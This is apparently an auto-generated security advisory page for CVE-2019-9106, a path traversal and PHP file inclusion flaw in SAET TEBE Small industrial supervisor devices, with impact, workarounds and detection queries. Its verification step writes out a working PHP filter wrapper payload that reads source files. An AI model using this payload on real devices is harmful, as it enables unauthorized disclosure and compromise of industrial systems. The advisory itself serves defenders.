CVE-2019-9106 – This vulnerability allows remote attackers to e... (How to Fix)

Q: What is the severity of CVE-2019-9106?

CVE-2019-9106 has a CVSS score of 9.8 (CRITICAL). This vulnerability allows remote attackers to execute or include local PHP files on SAET Impianti Speciali TEBE Small supervisor devices through path traversal in the WebApp interface. Attackers can read sensitive files like index.php using PHP filter wrappers. Affects organizations using SAET TEBE Small 05.01 build 1137 devices with WebApp v04.68.

📋 TL;DR

This vulnerability allows remote attackers to execute or include local PHP files on SAET Impianti Speciali TEBE Small supervisor devices through path traversal in the WebApp interface. Attackers can read sensitive files like index.php using PHP filter wrappers. Affects organizations using SAET TEBE Small 05.01 build 1137 devices with WebApp v04.68.

💻 Affected Systems

Products:

SAET Impianti Speciali TEBE Small Supervisor

Versions: TEBE Small 05.01 build 1137 with WebApp v04.68

Operating Systems: Embedded/Proprietary OS on SAET devices

Default Config Vulnerable: ⚠️ Yes

Notes: Affects the web interface component of the industrial supervisor device. The vulnerability is in the PHP file inclusion mechanism.

📦 What is this software?

Tebe Small Firmware by Saet

View all CVEs affecting Tebe Small Firmware →

Webapp by Saet

View all CVEs affecting Webapp →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Full system compromise allowing remote code execution, credential theft, and device takeover leading to industrial control system manipulation.

🟠

Likely Case

Information disclosure of PHP source code, configuration files, and potentially sensitive credentials stored in web application files.

🟢

If Mitigated

Limited impact if proper network segmentation and access controls prevent external exploitation attempts.

🌐 Internet-Facing: HIGH - The vulnerability is remotely exploitable without authentication and affects web interfaces that may be exposed to the internet.

🏢 Internal Only: HIGH - Even internally, the vulnerability allows attackers with network access to compromise the device and potentially pivot to other systems.

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: LIKELY

Unauthenticated Exploit: ⚠️ Yes

Complexity: LOW

The vulnerability is demonstrated with a simple URL manipulation using PHP filter wrappers. No authentication required and exploitation is straightforward.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Vendor Advisory: No official vendor advisory found

Restart Required: No

Instructions:

Contact SAET Impianti Speciali for firmware updates or security patches. Check their website for updated versions of TEBE Small software.

🔧 Temporary Workarounds

Network Segmentation

all

Isolate SAET TEBE Small devices from untrusted networks and the internet

Access Control Lists

all

Implement strict firewall rules to limit access to the web interface

🧯 If You Can't Patch

Implement network segmentation to isolate affected devices in a separate VLAN
Deploy a web application firewall (WAF) with rules to block PHP filter wrapper requests

🔍 How to Verify

Check if Vulnerable:

Access the device web interface and attempt to use the PHP filter wrapper payload: menu=php://filter/convert.base64-encode/resource=index.php

Check Version:

Check the web interface login page or device information page for version details

Verify Fix Applied:

Test if the PHP filter wrapper payload no longer returns base64-encoded PHP source code

📡 Detection & Monitoring

Log Indicators:

HTTP requests containing 'php://filter' or 'convert.base64-encode' in URL parameters
Unusual file access patterns to PHP files

Network Indicators:

HTTP requests with suspicious PHP wrapper parameters to the device web interface

SIEM Query:

http.url:*php://filter* AND http.url:*convert.base64-encode* AND dst_ip:[DEVICE_IP]

📊 Metadata

CVE ID: CVE-2019-9106

CVSS v3 Score: 9.8 (CRITICAL)

CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE: CWE-22

Published: May 31, 2019

Last Updated: November 21, 2024

🔗 References

https://members.backbox.org/saet-tebe-small-supervisor-multiple-vulnerabilities/ Exploit,Third Party Advisory
https://www.saet.org/wp-content/uploads/2017/04/Depliant_TEBE-TEBE_Small.pdf Product,Vendor Advisory
https://members.backbox.org/saet-tebe-small-supervisor-multiple-vulnerabilities/ Exploit,Third Party Advisory
https://www.saet.org/wp-content/uploads/2017/04/Depliant_TEBE-TEBE_Small.pdf Product,Vendor Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2019-9106, you might also want to check these: